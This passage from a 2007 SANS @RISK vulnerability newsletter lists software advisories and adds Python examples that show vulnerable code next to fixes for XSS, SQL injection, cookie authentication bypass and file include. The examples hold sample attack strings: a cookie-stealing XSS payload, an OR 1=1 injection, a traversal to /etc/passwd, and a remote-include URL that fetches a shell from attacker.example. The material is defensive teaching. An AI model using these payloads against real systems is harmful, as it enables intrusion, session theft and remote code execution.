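CANDIDATES = ["alice", "bob", "carol", "dave", "erin"]   # constructed wordlist

if __name__ == "__main__":
    print("weak server leaks:", enumerate_users(weak_login, CANDIDATES))
    print("hardened server leaks:", enumerate_users(hardened_login, CANDIDATES))
```

Against a real service the same classifier is run over HTTP responses (status, body length, and response time as well as the message text), which is why the hardened version also equalizes the work done on each path rather than only the wording.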

  • 07.34.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Font Parsing Remote Privilege Escalation
  • Description: Sun Java Runtime Environment is an enterprise development platform. The application is exposed to a remote privilege escalation issue that occurs in the font parsing code of the affected application.
  • Ref: http://sunsolve.sun.com/show.do?target=tous

  • 07.34.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco VPN Client for Windows Multiple Local Privilege Escalation Vulnerabilities
  • Description: Cisco VPN Client is a freely available IPsec client application that is used to connect to Cisco VPN servers. It is available for multiple platforms including Microsoft Windows, Apple Mac OS X, Unix and Linux. Cisco VPN Client for Windows is exposed to multiple local privilege escalation issues. Cisco VPN Client versions prior to 4.8.02.0010 and 5.0.01.0600 for the Microsoft Windows platform are affected.
  • Ref: http://www.securityfocus.com/archive/1/476651

  • 07.34.38 - CVE: CVE-2007-4278
  • Platform: Cross Platform
  • Title: ESRI ArcSDE Server SPrintf Function Stack Buffer Overflow
  • Description: ESRI ArcSDE Server is used to access multi-user geographic databases. The application is exposed to a remote stack-based buffer overflow issue because the application fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. ArcSDE service version 9.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476673

  • 07.34.39 - CVE: Not Available
  • Platform: Cross Platform
  • Title: RndLabs Babo Violent 2 Multiple Vulnerabilities
  • Description: Babo Violent 2 is a multiplayer game for Microsoft Windows and Linux. The application is exposed to multiple issues. RndLabs Babo Violent 2 version 2.08 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476520

  • 07.34.40 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Opera Web Browser Invalid Pointer Remote Code Execution
  • Description: The Opera Web Browser is a web client available for multiple platforms. The application is exposed to a remote code execution issue when parsing malicious JavaScript code. This issue occurs when a virtual function is invoked using an invalid pointer. Opera versions prior to 9.23 are affected.
  • Ref: http://www.opera.com/support/search/view/865/

  • 07.34.41 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Zoidcom Malformed Packet Denial of Service
  • Description: Zoidcom is a network library for developing gaming network protocols. It is available for Microsoft Windows, Linux and Mac OS X. The application is exposed to a denial of service issue when handling malformed packets. Zoidcom versions 0.6.5 and 0.6.7 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476523

  • 07.34.42 - CVE: Not Available
  • Platform: Cross Platform
  • Title: SurgeMail IMAP SEARCH Command Remote Buffer Overflow
  • Description: SurgeMail is a commercial email application for multiple platforms that contains an IMAP server. The application is exposed to a remote buffer overflow issue due to insufficient bounds checking of user-supplied input. SurgeMail version 38k is affected.
  • Ref: http://www.securityfocus.com/bid/25318

  • 07.34.43 - CVE: CVE-2007-3385, CVE-2007-3382
  • Platform: Cross Platform
  • Title: Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
  • Description: Apache Tomcat is a Java-based web server application for multiple operating systems. The application is exposed to multiple information disclosure issues because it fails to adequately sanitize user-supplied data. Apache Tomcat versions prior to 6.0.14 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476442

  • 07.34.44 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WengoPhone SIP Soft Phone Malformed Packet Denial of Service
  • Description: WengoPhone is a SIP Soft Phone for Microsoft Windows, Linux and Mac OS X operating systems. The application is exposed to a denial of service issue because the application fails to properly handle malformed data. WengoPhone version 2.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476270

  • 07.34.45 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Racer Remote Buffer Overflow
  • Description: Racer is a cross-platform racing simulator. The application is exposed to a remote buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. Racer version 0.5.3 beta 5 is affected.
  • Ref: http://www.securityfocus.com/bid/25297

  • 07.34.46 - CVE: CVE-2007-3386
  • Platform: Web Application - Cross Site Scripting
  • Title: Apache Tomcat Host Manager Servlet Cross-Site Scripting
  • Description: Apache Tomcat is a Java-based web server application for multiple operating systems. The Host Manager Servlet is a host management application that is included with Tomcat. The software is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "aliases" parameter of the "/host-manager/html/add" page prior to utilizing it in dynamically-generated pages. Apache Tomcat versions 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476448

  • 07.34.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Storesprite Next Parameter Multiple Cross-Site Scripting Vulnerabilities
  • Description: Storesprite is an ecommerce application. The software is exposed to multiple cross-site scripting issues because it fails to sanitize user input to the "next" parameter. Storesprite versions 7 and earlier are affected.
  • Ref: http://pridels-team.blogspot.com/2007/08/storesprite-xss-vuln.html

  • 07.34.48 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities
  • Description: phpMyAdmin is a web-based administrative interface for managing MySQL databases. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input.
  • Ref: http://pridels-team.blogspot.com/2007/08/phpmyadmin-multiple-xss-vuln.html
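The three cross-site scripting entries above (Tomcat Host Manager, Storesprite, phpMyAdmin) share one root cause: a request parameter written back into a page without encoding. The following is an added example, not code from any of those projects. It takes the Tomcat case as its shape, a parameter named "aliases" reflected on the page after a host is added, and shows the unencoded rendering beside the encoded one, using Python's html.parser as a stand-in for the browser's tokenizer to show what each produces. The surrounding HTML and the payloads are constructed.

```python
"""Reflected cross-site scripting in an echoed parameter, and the fix.

Added example, not Tomcat's Host Manager code. The parameter name follows the
advisory ("aliases" on /host-manager/html/add); the markup around it is constructed.
"""
import html
from html.parser import HTMLParser
from typing import Dict, Optional, Tuple


def render_unsafe(aliases: str) -> str:
    # Interpolates the raw parameter into both text context and attribute context.
    return (f"<p>Host added with aliases: {aliases}</p>\n"
            f'<input type="text" name="aliases" value="{aliases}">')


def render_safe(aliases: str) -> str:
    # quote=True is what makes the value inert inside a double-quoted attribute.
    escaped = html.escape(aliases, quote=True)
    return (f"<p>Host added with aliases: {escaped}</p>\n"
            f'<input type="text" name="aliases" value="{escaped}">')


class _MarkupInspector(HTMLParser):
    """Records what a tokenizer sees: script start tags and the input's attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.input_attrs: Dict[str, Optional[str]] = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            self.input_attrs.update(attrs)


def inspect(document: str) -> Tuple[int, Dict[str, Optional[str]]]:
    """Return (number of <script> tags, attributes of the <input>) in a document."""
    parser = _MarkupInspector()
    parser.feed(document)
    parser.close()
    return parser.script_tags, parser.input_attrs


# Constructed payloads: one for text context, one that closes the quoted attribute
# and adds an event handler.
TEXT_PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'

if __name__ == "__main__":
    for name, payload in (("text", TEXT_PAYLOAD), ("attribute", ATTR_PAYLOAD)):
        print(name, "unsafe:", inspect(render_unsafe(payload)))
        print(name, "safe:  ", inspect(render_safe(payload)))
```

The attribute payload is the reason a text-only filter (stripping "<script>") is not a fix: it never needs an angle bracket. Encoding for the context the value lands in, here HTML text and a quoted attribute, is what closes both variants, and the decoded attribute value on the safe page is still the original string, so legitimate input is not damaged.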

  • 07.34.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: GetMyOwnArcade Search.PHP SQL Injection
  • Description: GetMyOwnArcade is a PHP-based application that allows users to create an online gaming site. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "query" parameter of the "search.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/25345

  • 07.34.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: IBM Rational ClearQuest Username Parameter SQL Injection
  • Description: IBM Rational ClearQuest is an application for managing software projects. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "username" parameter of the "cqweb/main" script before using it in an SQL query. IBM Rational ClearQuest versions 7.0.0.0 and 7.0.0.1 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476475

  • 07.34.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Prozilla Webring Website Script Category.PHP SQL Injection
  • Description: Prozilla Webring Website Script is a PHP-based application for creating web sites. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "cat" parameter of the "category.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/25292
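The three SQL injection entries above (the "query" parameter of search.php, the "username" parameter of cqweb/main, the "cat" parameter of category.php) all describe a parameter concatenated into a query. The following is an added example, not code from GetMyOwnArcade, ClearQuest or Prozilla: a string-built search beside its parameterised form, plus the integer-conversion pattern for numeric ids such as "cat". sqlite3 stands in for the applications' back ends; the table, rows and payload are constructed.

```python
"""SQL injection through a string-built query, and the parameterised fix.

Added example, not code from GetMyOwnArcade, ClearQuest or Prozilla. The table,
rows and payload are constructed; sqlite3 stands in for the real back ends.
"""
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE games (id INTEGER PRIMARY KEY, name TEXT NOT NULL, published INTEGER NOT NULL);
        INSERT INTO games (name, published) VALUES
            ('Tetris clone', 1), ('Snake', 1), ('Unreleased beta', 0);
    """)
    return conn


def search_unsafe(conn: sqlite3.Connection, query: str) -> List[str]:
    # The parameter is pasted into the statement, so the attacker edits the WHERE clause.
    sql = f"SELECT name FROM games WHERE published = 1 AND name LIKE '%{query}%'"
    return sorted(row[0] for row in conn.execute(sql))


def search_safe(conn: sqlite3.Connection, query: str) -> List[str]:
    # Bound parameter: the value is data and cannot change the statement's structure.
    sql = "SELECT name FROM games WHERE published = 1 AND name LIKE ?"
    return sorted(row[0] for row in conn.execute(sql, (f"%{query}%",)))


def game_by_id_safe(conn: sqlite3.Connection, raw_id: str) -> Optional[str]:
    # Numeric parameters such as "cat" or "jobid": convert first, then bind.
    try:
        game_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT name FROM games WHERE id = ?", (game_id,)).fetchone()
    return row[0] if row else None


# Constructed payload: closes the quoted pattern, adds an always-true clause and
# comments out the rest of the statement, so the published = 1 filter is defeated.
PAYLOAD = "x%' OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", search_unsafe(db, PAYLOAD))   # every row, including the unpublished one
    print("safe:  ", search_safe(db, PAYLOAD))     # nothing matches the literal string
```

One caveat on the safe version: binding stops injection, but "%" and "_" in the user's string are still LIKE wildcards. If that matters to the application, escape them and add an ESCAPE clause; that is a correctness concern, not an injection one.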

  • 07.34.52 - CVE: Not Available
  • Platform: Web Application
  • Title: Système de vote pour site Web Multiple Remote File Include Vulnerabilities
  • Description: Système de vote pour site Web is a PHP-based voting application. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "NomVote" and "FilePalHex" parameters of the "depouilg.php3" script. Système de vote pour site Web version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25335

  • 07.34.53 - CVE: Not Available
  • Platform: Web Application
  • Title: EFS Software Easy Chat Server Authentication Request Handling Remote Denial of Service
  • Description: Easy Chat Server is a web-based chat server for the Microsoft Windows operating system. The server is exposed to a remote denial of service issue which arises when an attacker supplies excessive data as part of the authentication credentials. Easy Chat Server version 2.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476523

  • 07.34.54 - CVE: Not Available
  • Platform: Web Application
  • Title: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
  • Description: DeskPRO is a web-based helpdesk application. The application is exposed to multiple HTML injection issues because it fails to sufficiently sanitize user-supplied input data. DeskPRO version 3.0.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476454

  • 07.34.55 - CVE: Not Available
  • Platform: Web Application
  • Title: Article Dashboard Multiple Input Validation Vulnerabilities
  • Description: Article Dashboard is an application that facilitates the publication of articles on a web site; it is implemented in PHP with a MySQL database. The application is exposed to multiple input validation issues, including an SQL injection issue that can be exploited through the "id" parameter of the "article.php" script and multiple cross-site scripting issues that affect various parameters of the "signup.php" script.
  • Ref: http://www.securityfocus.com/bid/25309/info

  • 07.34.56 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Content Construction Kit Nodereference Module Multiple HTML Injection Vulnerabilities
  • Description: Drupal Content Construction Kit is a component of the Drupal CMS. The application is exposed to multiple HTML injection issues because it fails to sufficiently sanitize user-supplied input before displaying it in dynamically generated content. Drupal Content Construction Kit versions 5.0-1.5 and 4.7.0-1.5 are affected.
  • Ref: http://drupal.org/node/166998

  • 07.34.57 - CVE: CVE-2007-4259, CVE-2007-4261, CVE-2007-4262
  • Platform: Web Application
  • Title: EZPhotoSales Multiple Input Validation Vulnerabilities
  • Description: EZPhotoSales is a web-based application. The application is exposed to multiple input validation issues because the application fails to properly sanitize user-supplied input and protect sensitive information. EZPhotoSales version 1.9.3 is affected.
  • Ref: http://www.airscanner.com/security/07080601_ezphotosales.htm

  • 07.34.58 - CVE: Not Available
  • Platform: Web Application
  • Title: Szymon Kosok Best Top List Banner-Upload.PHP Arbitrary File Upload
  • Description: Best Top List is a web-based application. It is exposed to an arbitrary file upload issue that occurs because the application fails to sanitize user-supplied input to the "userfile" parameter of the "banner-upload.php" script before storing the uploaded file on the web server. Best Top List version 2.11 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476258

  • 07.34.59 - CVE: Not Available
  • Platform: Web Application
  • Title: OWASP Stinger Filter Bypass Weakness
  • Description: Open Web Application Security Project (OWASP) Stinger is a freely available Java framework for input validation in web applications. OWASP Stinger is exposed to a filter bypass weakness because the application fails to properly handle certain input. Open Web Application Security Project Stinger versions prior to 2.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476288

  • 07.34.60 - CVE: Not Available
  • Platform: Web Application
  • Title: SkilMatch Systems JobLister3 Index.PHP SQL Injection
  • Description: JobLister3 is a PHP-based application that allows users to view and manage job listings. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "jobid" parameter of the "index.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/archive/1/476282

  • 07.34.61 - CVE: Not Available
  • Platform: Web Application
  • Title: SOTEeSKLEP _Files Local File Include
  • Description: SOTEeSKLEP is an ecommerce application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "file" parameter of the "go/_files/index.php" script. SOTEeSKLEP versions 3.1RC8, 3.5RC1, 3.5RC4, and 3.5RC9 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476268

  • 07.34.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Streamripper HTTP Header Parsing Buffer Overflow
  • Description: Streamripper is an application that is used to record shoutcast-compatible streams. The application is exposed to a remote buffer overflow issue because the application fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. Streamripper versions prior to 1.62.2 are affected.
  • Ref: http://www.securityfocus.com/bid/25278

  • 07.34.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Multiple IRC Client Now Playing Scripts Input Validation
  • Description: "Now Playing" scripts for IRC clients automatically print information about the currently playing song to a user's IRC chat sessions. These scripts are exposed to an input validation issue because they fail to adequately sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/476283

  • 07.34.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Php Blue Dragon Multiple Input Validation Vulnerabilities
  • Description: Php Blue Dragon CMS is a PHP-based content manager. The application is exposed to multiple input validation issues because it fails to sufficiently sanitize user-supplied input. Php Blue Dragon CMS version 3.0.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25264

  • 07.34.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Lib2 PHP Library My_Statistics.PHP Remote File Include
  • Description: Lib2 PHP Library is a content management system (CMS) library. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "DOCUMENT_ROOT" parameter of the "lib/config.php" script. Lib2 PHP Library version 0.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476271

  • 07.34.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Php-Stats WhoIs.PHP Cross-Site Scripting
  • Description: Php-Stats is a web statistics application. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "IP" parameter of the "whois.php" script. Php-Stats version 0.1.9.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476139

  • 07.34.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Haudenschilt Family Connections Index.PHP Authentication Bypass
  • Description: Haudenschilt Family Connections is a content management system (CMS). The application is exposed to an authentication bypass issue that affects the "$_COOKIE['fcms_login_id']" cookie parameter used by the "index.php" script. Family Connections version 0.1.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476142
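The Family Connections entry names the cookie but not the mechanism. The following added example (not the project's code) assumes the usual shape of such a bypass, a login id read straight from the cookie and trusted, and sets a signed, expiring cookie value beside it. The cookie name follows the advisory; the user table, server secret and timestamps are constructed.

```python
"""Authentication state carried in a client-controlled cookie, and a signed alternative.

Added example, not Family Connections code. The cookie name follows the advisory;
the assumption that the stored login id is trusted as sent is what the unsafe
function models. Users, secret and timestamps are constructed.
"""
import hashlib
import hmac
from typing import Dict, Optional

SERVER_SECRET = b"constructed-secret-keep-out-of-the-web-root"
USERS: Dict[int, str] = {1: "admin", 2: "guest"}


def unsafe_current_user(cookies: Dict[str, str]) -> Optional[str]:
    """Trusts whatever id the browser sends: any visitor can set fcms_login_id=1."""
    raw = cookies.get("fcms_login_id")
    if raw is None or not raw.isdigit():
        return None
    return USERS.get(int(raw))


def _mac(payload: str) -> str:
    return hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_login_cookie(user_id: int, now: int, ttl: int = 3600) -> str:
    """Value the server sets after a successful password check: id.expiry.mac"""
    payload = f"{user_id}.{now + ttl}"
    return f"{payload}.{_mac(payload)}"


def safe_current_user(cookies: Dict[str, str], now: int) -> Optional[str]:
    """Accept the id only if the MAC over id and expiry verifies and the cookie is unexpired."""
    raw = cookies.get("fcms_login_id")
    if not raw:
        return None
    parts = raw.split(".")
    if len(parts) != 3:
        return None
    user_id, expiry, mac = parts
    if not (user_id.isdigit() and expiry.isdigit()):
        return None
    # Verify before acting on any field; compare_digest avoids a timing side channel.
    if not hmac.compare_digest(mac, _mac(f"{user_id}.{expiry}")):
        return None
    if int(expiry) < now:
        return None
    return USERS.get(int(user_id))


if __name__ == "__main__":
    forged = {"fcms_login_id": "1"}                    # attacker simply claims to be user 1
    print("unsafe accepts forged cookie as:", unsafe_current_user(forged))
    print("safe accepts forged cookie as:  ", safe_current_user(forged, now=1000))
    genuine = {"fcms_login_id": issue_login_cookie(2, now=1000)}
    print("safe accepts genuine cookie as: ", safe_current_user(genuine, now=1500))
```

A server-side session store (a random session id in the cookie, the user id looked up on the server) is the other standard answer and makes revocation straightforward; either way the cookie should also be sent with the HttpOnly and Secure flags so it is not exposed to script or to cleartext transport.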

  • 07.34.68 - CVE: Not Available
  • Platform: Web Application
  • Title: OpenAds Lib-RemoteHost.INC.PHP Remote File Include
  • Description: OpenAds (formerly known as phpAdsNew) is a PHP-based ad server. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpAds_geoPlugin" parameter of the "libraries/lib-remotehost.inc.php" script. OpenAds versions 2.0.11 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/25277
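The file include entries above (SOTEeSKLEP's "file" parameter, Lib2's "DOCUMENT_ROOT", OpenAds' "phpAds_geoPlugin") are the same bug in remote and local form: a request parameter handed to include(). The following is an added example, not code from any of those projects. It models what include() does with a user-controlled string (a URL pulls in remote code when allow_url_include is on; "../" walks the local tree) and shows an allow-list resolver that also rejects stream wrappers and null bytes. Paths and the allow-list are constructed, and nothing touches the disk.

```python
"""Remote/local file include through an unvalidated "file" parameter, and the fix.

Added example, not code from SOTEeSKLEP, Lib2 or OpenAds. resolve_unsafe() models
include($_GET['file']); resolve_safe() maps the parameter onto a fixed set of files.
BASE_DIR and the allow-list are constructed; nothing here reads the filesystem.
"""
import posixpath
from urllib.parse import urlsplit

BASE_DIR = "/var/www/app/includes"
ALLOWED_INCLUDES = frozenset({"header.php", "footer.php", "config.php"})


def resolve_unsafe(value: str) -> str:
    """include($_GET['file']): URLs and absolute paths are used exactly as given."""
    if "://" in value or value.startswith("/"):
        return value
    return posixpath.join(BASE_DIR, value)


def resolve_safe(value: str) -> str:
    """Accept only names on the allow-list; reject URLs, wrappers, traversal, NULs."""
    if "\0" in value:
        raise ValueError("null byte in include name")
    if urlsplit(value).scheme:                 # http://, ftp://, php://, data: ...
        raise ValueError("remote or wrapper include attempt")
    name = posixpath.normpath(value)           # "./footer.php" -> "footer.php"
    if name not in ALLOWED_INCLUDES:
        raise ValueError(f"{value!r} is not an allowed include")
    path = posixpath.join(BASE_DIR, name)
    # Defence in depth: the resolved path must still live under BASE_DIR.
    if posixpath.commonpath([BASE_DIR, path]) != BASE_DIR:
        raise ValueError("resolved path escapes the include directory")
    return path


def is_allowed(value: str) -> bool:
    try:
        resolve_safe(value)
        return True
    except ValueError:
        return False


# Constructed attacker inputs.
REMOTE = "http://attacker.example/shell.txt?"
TRAVERSAL = "../../../../etc/passwd"
WRAPPER = "php://input"
NULL_BYTE = "config.php\0.jpg"

if __name__ == "__main__":
    for value in (REMOTE, TRAVERSAL, WRAPPER, "header.php"):
        print(f"{value!r:42} unsafe -> {resolve_unsafe(value)!r:48} allowed: {is_allowed(value)}")
```

The allow-list is the real control here; the scheme, traversal and NUL checks are there so the function fails closed on inputs that are obviously hostile even if the list is later widened to something pattern-based. On the PHP side, allow_url_include=Off removes the remote variant outright, but not the local one.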

  • 07.34.69 - CVE: Not Available
  • Platform: Network Device
  • Title: BlueCat Networks Adonis CLI Remote Privilege Escalation
  • Description: BlueCat Networks Adonis is a DHCP (Dynamic Host Configuration Protocol) and DNS (Domain Name System) appliance; BlueCat Networks Proteus is an appliance for managing IP addresses. Adonis is exposed to a remote privilege escalation issue in its command-line interface because the software fails to properly sanitize user-supplied input. Adonis version 5.0.2.8 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476785

  • 07.34.70 - CVE: Not Available
  • Platform: Network Device
  • Title: NETGEAR ReadyNAS RAIDiator Remote SSH Backdoor
  • Description: NETGEAR ReadyNAS is a network-attached storage device, previously sold by Infrant. RAIDiator is the name of the operating system for ReadyNAS devices. The device is exposed to a remote SSH backdoor issue because the superuser password accepted by its SSH service is readily guessable by remote attackers. Devices with firmware versions 3.01c1-p1 and 3.01c1-p6 installed are affected.
  • Ref: http://www.infrant.com/forum/viewtopic.php?t=12313

  • 07.34.71 - CVE: Not Available
  • Platform: Network Device
  • Title: Dell Remote Access Card 4/P SSH Remote Denial of Service
  • Description: Dell Remote Access Cards (DRACs) allow administrators to manage remote computers. The cards use an integrated SSH Daemon based on Monica SSH. DRACs are exposed to a remote denial of service issue. Dell Remote Access Card 4/P running firmware 1.50 (Build 02.16) is affected.
  • Ref: http://www.securityfocus.com/archive/1/476301

(c) 2007. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.